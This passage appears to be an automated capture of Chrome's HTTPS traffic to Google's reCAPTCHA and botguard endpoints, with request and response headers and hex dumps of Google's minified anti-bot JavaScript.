                                                                                                                                                                                                                                                                  Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:08 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:08 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=300
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC108INData Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js');
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  55192.168.2.1649774142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC832OUTGET /js/bg/p-7RyvuJU9m0QQmVDJx8SL9t4pWXVpOJSp0296ydJmo.js HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&co=aHR0cHM6Ly91c3FlLmJpbjR0Z2xhLmNvbTo0NDM.&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=normal&cb=5a6ztk5kgw7u
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC811INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs"
                                                                                                                                                                                                                                                                  Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
                                                                                                                                                                                                                                                                  Content-Length: 18916
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Server: sffe
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 15:25:41 GMT
                                                                                                                                                                                                                                                                  Expires: Wed, 29 Oct 2025 15:25:41 GMT
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                  Last-Modified: Tue, 22 Oct 2024 16:30:00 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/javascript
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Age: 13467
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC567INData Raw: 2f 2a 20 41 6e 74 69 2d 73 70 61 6d 2e 20 57 61 6e 74 20 74 6f 20 73 61 79 20 68 65 6c 6c 6f 3f 20 43 6f 6e 74 61 63 74 20 28 62 61 73 65 36 34 29 20 59 6d 39 30 5a 33 56 68 63 6d 51 74 59 32 39 75 64 47 46 6a 64 45 42 6e 62 32 39 6e 62 47 55 75 59 32 39 74 20 2a 2f 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 7a 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 4c 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 29 7b 69 66 28 66 3d 28 62 3d 6e 75 6c 6c 2c 7a 29 2e 74 72 75 73 74 65 64 54 79 70 65 73 2c 21 66 7c 7c 21 66 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 62 3b 74 72 79 7b 62 3d 66 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 54 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 54 2c 63 72 65 61 74 65 53
                                                                                                                                                                                                                                                                  Data Ascii: /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var z=this||self,L=function(f,b){if(f=(b=null,z).trustedTypes,!f||!f.createPolicy)return b;try{b=f.createPolicy("bg",{createHTML:T,createScript:T,createS
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC1378INData Raw: 4c 43 27 2c 0a 27 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 27 2c 0a 27 2a 2f 27 2c 0a 27 76 61 72 20 57 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 66 34 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 2c 64 2c 54 29 7b 66 6f 72 28 64 3d 28 54 3d 42 28 66 29 2c 30 29 3b 62 3e 30 3b 62 2d 2d 29 64 3d 64 3c 3c 38 7c 67 28 66 29 3b 68 28 54 2c 66 2c 64 29 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 2e 47 3f 62 4b 28 66 2e 59 2c 66 29 3a 65 28 38 2c 66 2c 74 72 75 65 29 7d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 29 7b 69 66 28 66 2e 47 29 72 65 74 75 72 6e 20 62 4b 28 66 2e 59 2c 66 29 3b 72 65 74 75 72 6e 20 62 3d 65 28 38 2c 66 2c 74 72 75 65 29 2c 62 26 31 32 38 26 26 28 62
                                                                                                                                                                                                                                                                  Data Ascii: LC',' SPDX-License-Identifier: Apache-2.0','*/','var W=this||self,f4=function(f,b,d,T){for(d=(T=B(f),0);b>0;b--)d=d<<8|g(f);h(T,f,d)},g=function(f){return f.G?bK(f.Y,f):e(8,f,true)},B=function(f,b){if(f.G)return bK(f.Y,f);return b=e(8,f,true),b&128&&(b
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC1378INData Raw: 66 29 2c 42 28 66 29 29 2c 5a 28 66 2c 64 29 29 29 2c 54 2c 66 29 7d 2c 49 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 2c 64 2c 54 2c 6c 2c 6b 29 7b 69 66 28 62 2e 41 2e 6c 65 6e 67 74 68 29 7b 62 2e 5a 53 3d 28 28 62 2e 52 26 26 22 3a 54 51 52 3a 54 51 52 3a 22 28 29 2c 62 29 2e 52 3d 74 72 75 65 2c 66 29 3b 74 72 79 7b 6c 3d 62 2e 42 28 29 2c 62 2e 49 3d 6c 2c 62 2e 53 3d 30 2c 62 2e 76 3d 30 2c 62 2e 4c 3d 6c 2c 54 3d 57 31 28 66 2c 62 29 2c 66 3d 64 3f 30 3a 31 30 2c 6b 3d 62 2e 42 28 29 2d 62 2e 49 2c 62 2e 4b 57 2b 3d 6b 2c 62 2e 70 57 26 26 62 2e 70 57 28 6b 2d 62 2e 4f 2c 62 2e 67 2c 62 2e 55 2c 62 2e 53 29 2c 62 2e 4f 3d 30 2c 62 2e 67 3d 66 61 6c 73 65 2c 62 2e 55 3d 66 61 6c 73 65 2c 6b 3c 66 7c 7c 62 2e 41 63 2d 2d 3c 3d 30 7c 7c 28 6b 3d 4d 61 74
                                                                                                                                                                                                                                                                  Data Ascii: f),B(f)),Z(f,d))),T,f)},I=function(f,b,d,T,l,k){if(b.A.length){b.ZS=((b.R&&":TQR:TQR:"(),b).R=true,f);try{l=b.B(),b.I=l,b.S=0,b.v=0,b.L=l,T=W1(f,b),f=d?0:10,k=b.B()-b.I,b.KW+=k,b.pW&&b.pW(k-b.O,b.g,b.U,b.S),b.O=0,b.g=false,b.U=false,k<f||b.Ac--<=0||(k=Mat
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC1378INData Raw: 28 7a 7c 30 29 26 28 31 3c 3c 7a 29 2d 31 29 3c 3c 28 6c 7c 30 29 2d 28 7a 7c 30 29 2c 6c 2d 3d 7a 2c 59 2b 3d 7a 3b 72 65 74 75 72 6e 20 68 28 31 39 39 2c 62 2c 28 4f 7c 28 64 3d 54 2c 30 29 29 2b 28 66 7c 30 29 29 2c 64 7d 2c 51 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 2c 64 2c 54 2c 6c 2c 6b 29 7b 69 66 28 64 2e 43 3d 3d 64 29 66 6f 72 28 6b 3d 5a 28 64 2c 62 29 2c 62 3d 3d 35 36 7c 7c 62 3d 3d 37 30 7c 7c 62 3d 3d 32 34 35 3f 28 62 3d 66 75 6e 63 74 69 6f 6e 28 4f 2c 70 2c 79 2c 7a 29 7b 69 66 28 6b 2e 7a 59 21 3d 28 70 3d 28 7a 3d 6b 2e 6c 65 6e 67 74 68 2c 28 7a 7c 30 29 2d 34 3e 3e 33 29 2c 70 29 29 7b 70 3d 28 70 3c 3c 33 29 2d 28 79 3d 5b 30 2c 30 2c 28 6b 2e 7a 59 3d 70 2c 6c 5b 31 5d 29 2c 6c 5b 32 5d 5d 2c 34 29 3b 74 72 79 7b 6b 2e 4d 37 3d 79
                                                                                                                                                                                                                                                                  Data Ascii: (z|0)&(1<<z)-1)<<(l|0)-(z|0),l-=z,Y+=z;return h(199,b,(O|(d=T,0))+(f|0)),d},Q=function(f,b,d,T,l,k){if(d.C==d)for(k=Z(d,b),b==56||b==70||b==245?(b=function(O,p,y,z){if(k.zY!=(p=(z=k.length,(z|0)-4>>3),p)){p=(p<<3)-(y=[0,0,(k.zY=p,l[1]),l[2]],4);try{k.M7=y
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC1378INData Raw: 68 28 66 2c 54 3e 3e 38 26 32 35 35 2c 54 26 32 35 35 29 2c 6c 21 3d 76 6f 69 64 20 30 26 26 4f 2e 70 75 73 68 28 6c 26 32 35 35 29 29 2c 66 3d 22 22 2c 64 26 26 28 64 2e 6d 65 73 73 61 67 65 26 26 28 66 2b 3d 64 2e 6d 65 73 73 61 67 65 29 2c 64 2e 73 74 61 63 6b 26 26 28 66 2b 3d 22 3a 22 2b 64 2e 73 74 61 63 6b 29 29 2c 64 3d 5a 28 62 2c 33 39 37 29 2c 64 5b 30 5d 3e 33 29 29 7b 64 3d 28 66 3d 4e 50 28 28 64 5b 66 3d 66 2e 73 6c 69 63 65 28 30 2c 28 64 5b 30 5d 7c 30 29 2d 33 29 2c 30 5d 2d 3d 28 66 2e 6c 65 6e 67 74 68 7c 30 29 2b 33 2c 66 29 29 2c 62 2e 43 29 2c 62 2e 43 3d 62 3b 74 72 79 7b 62 2e 61 45 3f 28 70 3d 28 70 3d 5a 28 62 2c 33 36 30 29 29 26 26 70 5b 70 2e 6c 65 6e 67 74 68 2d 31 5d 7c 7c 39 35 2c 28 6b 3d 5a 28 62 2c 35 34 29 29 26 26 6b
                                                                                                                                                                                                                                                                  Data Ascii: h(f,T>>8&255,T&255),l!=void 0&&O.push(l&255)),f="",d&&(d.message&&(f+=d.message),d.stack&&(f+=":"+d.stack)),d=Z(b,397),d[0]>3)){d=(f=NP((d[f=f.slice(0,(d[0]|0)-3),0]-=(f.length|0)+3,f)),b.C),b.C=b;try{b.aE?(p=(p=Z(b,360))&&p[p.length-1]||95,(k=Z(b,54))&&k
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC1378INData Raw: 68 28 37 30 2c 66 2c 28 68 28 31 36 38 2c 28 28 68 28 31 31 36 2c 28 50 28 38 30 2c 28 50 28 32 31 36 2c 28 50 28 32 35 2c 28 50 28 31 39 30 2c 28 50 28 28 68 28 32 36 2c 66 2c 28 68 28 31 39 39 2c 28 28 66 2e 6c 61 61 6e 74 66 3d 28 66 2e 6b 75 79 64 71 73 3d 5b 5d 2c 66 2e 63 70 6e 71 6a 6e 3d 22 22 2c 66 2e 62 67 6f 64 6e 64 3d 30 2c 5b 5d 29 2c 66 2e 44 26 26 66 2e 44 2e 61 29 26 26 28 28 64 3d 66 2e 44 2e 62 29 26 26 28 66 2e 62 67 6f 64 6e 64 3d 64 29 2c 28 64 3d 66 2e 44 2e 63 29 26 26 28 66 2e 63 70 6e 71 6a 6e 3d 64 29 2c 28 64 3d 66 2e 44 2e 64 29 26 26 28 66 2e 6b 75 79 64 71 73 3d 64 29 2c 28 64 3d 66 2e 44 2e 65 29 26 26 28 66 2e 6c 61 61 6e 74 66 3d 64 29 29 2c 66 29 2c 30 29 2c 30 29 29 2c 36 38 29 2c 66 2c 66 75 6e 63 74 69 6f 6e 28 7a 29
                                                                                                                                                                                                                                                                  Data Ascii: h(70,f,(h(168,((h(116,(P(80,(P(216,(P(25,(P(190,(P((h(26,f,(h(199,((f.laantf=(f.kuydqs=[],f.cpnqjn="",f.bgodnd=0,[]),f.D&&f.D.a)&&((d=f.D.b)&&(f.bgodnd=d),(d=f.D.c)&&(f.cpnqjn=d),(d=f.D.d)&&(f.kuydqs=d),(d=f.D.e)&&(f.laantf=d)),f),0),0)),68),f,function(z)
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC1378INData Raw: 2c 4d 2c 4e 29 7b 66 6f 72 28 4e 3d 28 4d 3d 28 4c 3d 5a 28 7a 2c 28 59 3d 28 78 3d 42 28 7a 29 2c 6e 3d 4c 34 28 7a 29 2c 22 22 29 2c 35 31 31 29 29 2c 4c 2e 6c 65 6e 67 74 68 29 2c 30 29 3b 6e 2d 2d 3b 29 4e 3d 28 28 4e 7c 30 29 2b 28 4c 34 28 7a 29 7c 30 29 29 25 4d 2c 59 2b 3d 70 5b 4c 5b 4e 5d 5d 3b 68 28 78 2c 7a 2c 59 29 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 7a 29 7b 66 34 28 7a 2c 34 29 7d 29 29 2c 68 29 28 34 37 35 2c 66 2c 5b 31 36 30 2c 30 2c 30 5d 29 2c 66 75 6e 63 74 69 6f 6e 28 7a 2c 4c 2c 59 2c 6e 29 7b 68 28 28 59 3d 28 6e 3d 5a 28 7a 2c 28 4c 3d 28 6e 3d 28 59 3d 42 28 7a 29 2c 42 29 28 7a 29 2c 42 29 28 7a 29 2c 6e 29 29 2c 5a 28 7a 2c 59 29 3d 3d 6e 29 2c 4c 29 2c 7a 2c 2b 59 29 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 7a 2c 4c 2c 59 29
                                                                                                                                                                                                                                                                  Data Ascii: ,M,N){for(N=(M=(L=Z(z,(Y=(x=B(z),n=L4(z),""),511)),L.length),0);n--;)N=((N|0)+(L4(z)|0))%M,Y+=p[L[N]];h(x,z,Y)})),function(z){f4(z,4)})),h)(475,f,[160,0,0]),function(z,L,Y,n){h((Y=(n=Z(z,(L=(n=(Y=B(z),B)(z),B)(z),n)),Z(z,Y)==n),L),z,+Y)})),function(z,L,Y)
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC1378INData Raw: 77 20 78 5b 4d 5d 3a 6e 3d 3d 31 3f 6e 65 77 20 78 5b 4d 5d 28 4c 5b 30 5d 29 3a 6e 3d 3d 32 3f 6e 65 77 20 78 5b 4d 5d 28 4c 5b 30 5d 2c 4c 5b 31 5d 29 3a 6e 3d 3d 33 3f 6e 65 77 20 78 5b 4d 5d 28 4c 5b 30 5d 2c 4c 5b 31 5d 2c 4c 5b 32 5d 29 3a 6e 3d 3d 34 3f 6e 65 77 20 78 5b 4d 5d 28 4c 5b 30 5d 2c 4c 5b 31 5d 2c 4c 5b 32 5d 2c 4c 5b 33 5d 29 3a 32 28 29 2c 68 28 59 2c 7a 2c 4c 29 29 7d 29 29 2c 66 29 2c 66 75 6e 63 74 69 6f 6e 28 7a 2c 4c 2c 59 2c 6e 2c 78 2c 4d 2c 4e 29 7b 69 66 28 21 47 28 74 72 75 65 2c 74 72 75 65 2c 7a 2c 4c 29 29 7b 69 66 28 54 4c 28 28 59 3d 28 78 3d 5a 28 28 4d 3d 5a 28 28 4c 3d 28 4d 3d 28 59 3d 28 4c 3d 28 78 3d 42 28 7a 29 2c 42 28 7a 29 29 2c 42 28 7a 29 29 2c 42 28 7a 29 29 2c 5a 28 7a 2c 4c 29 29 2c 7a 29 2c 4d 29 2c 7a
                                                                                                                                                                                                                                                                  Data Ascii: w x[M]:n==1?new x[M](L[0]):n==2?new x[M](L[0],L[1]):n==3?new x[M](L[0],L[1],L[2]):n==4?new x[M](L[0],L[1],L[2],L[3]):2(),h(Y,z,L))})),f),function(z,L,Y,n,x,M,N){if(!G(true,true,z,L)){if(TL((Y=(x=Z((M=Z((L=(M=(Y=(L=(x=B(z),B(z)),B(z)),B(z)),Z(z,L)),z),M),z
                                                                                                                                                                                                                                                                  2024-10-29 19:10:08 UTC1378INData Raw: 20 30 29 2c 66 7d 2c 41 42 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 74 68 69 73 2e 48 3d 74 68 69 73 2e 6c 3d 74 68 69 73 2e 6e 3d 30 7d 72 65 74 75 72 6e 5b 66 75 6e 63 74 69 6f 6e 28 54 29 7b 62 2e 63 34 28 54 29 2c 66 2e 63 34 28 54 29 7d 2c 28 66 3d 28 62 3d 28 28 64 2e 70 72 6f 74 6f 74 79 70 65 2e 4f 39 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 3d 3d 3d 30 3f 30 3a 4d 61 74 68 2e 73 71 72 74 28 74 68 69 73 2e 6c 2f 74 68 69 73 2e 6e 29 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 29 2e 63 34 3d 66 75 6e 63 74 69 6f 6e 28 54 2c 6c 29 7b 74 68 69 73 2e 6c 2b 3d 28 6c 3d 54 2d 74 68 69 73 2e 48 2c 74 68 69 73 2e 6e 2b 2b 2c 74 68 69 73 2e 48 2b 3d 6c 2f 74 68 69 73 2e 6e 2c 6c 29 2a
                                                                                                                                                                                                                                                                  Data Ascii: 0),f},AB=function(f,b){function d(){this.H=this.l=this.n=0}return[function(T){b.c4(T),f.c4(T)},(f=(b=((d.prototype.O9=function(){return this.n===0?0:Math.sqrt(this.l/this.n)},d.prototype).c4=function(T,l){this.l+=(l=T-this.H,this.n++,this.H+=l/this.n,l)*
                                                                                                                                                                                                                                                                  2024-10-29 19:10:09 UTC1378INData Raw: 74 65 3d 3d 3d 22 6c 6f 61 64 69 6e 67 22 26 26 28 62 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 6b 2c 4f 29 7b 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 4f 7c 7c 28 4f 3d 74 72 75 65 2c 6b 28 29 29 7d 57 2e 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 28 4f 3d 66 61 6c 73 65 2c 70 29 2c 4a 29 2c 57 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 70 2c 4a 29 7d 29 7d 7d 2c 53 2c 4a 42 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 62 29 7b 69 66 28 28 66 3d 28 62 3d 6e 75 6c 6c 2c 57 2e 74 72 75 73 74 65 64 54 79 70 65 73 29 2c 21 66 29 7c 7c 21 66 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 62 3b 74 72 79 7b 62 3d 66 2e 63 72 65 61 74 65 50
                                                                                                                                                                                                                                                                  Data Ascii: te==="loading"&&(b.Z=function(k,O){function p(){O||(O=true,k())}W.document.addEventListener("DOMContentLoaded",(O=false,p),J),W.addEventListener("load",p,J)})}},S,JB=function(f,b){if((f=(b=null,W.trustedTypes),!f)||!f.createPolicy)return b;try{b=f.createP


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  56192.168.2.1649777142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:09 UTC491OUTGET /recaptcha/api2/webworker.js?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC917INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                  Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:10 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:10 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=300
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC108INData Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js');
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  57192.168.2.1649778142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:09 UTC483OUTGET /js/bg/p-7RyvuJU9m0QQmVDJx8SL9t4pWXVpOJSp0296ydJmo.js HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC811INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs"
                                                                                                                                                                                                                                                                  Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
                                                                                                                                                                                                                                                                  Content-Length: 18916
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Server: sffe
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 15:25:41 GMT
                                                                                                                                                                                                                                                                  Expires: Wed, 29 Oct 2025 15:25:41 GMT
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                  Last-Modified: Tue, 22 Oct 2024 16:30:00 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/javascript
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Age: 13469
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
